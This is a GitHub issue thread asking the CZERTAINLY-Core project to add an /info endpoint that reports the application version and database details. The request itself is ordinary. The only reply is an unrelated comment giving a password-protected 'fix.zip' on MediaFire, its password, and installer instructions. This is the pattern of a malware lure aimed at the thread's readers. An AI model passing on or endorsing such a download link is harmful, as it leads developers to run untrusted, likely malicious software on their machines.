### ISSUE TITLE
Add info endpoint to provide information about CZERTAINLY application

### ISSUE THREAD

**Issue by lubomirw** [CZERTAINLY/CZERTAINLY-Core#826]
Add `/info` endpoint to provide information about running CZERTAINLY application. It should provide following
- current version of Core as stated in `pom.xml`
- DB system and version (e.g. Postgres 12.1)

Note: It is worth to explore functionality provided by Actuator. If information provided by library are suitable for our needs, we should utilize it.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
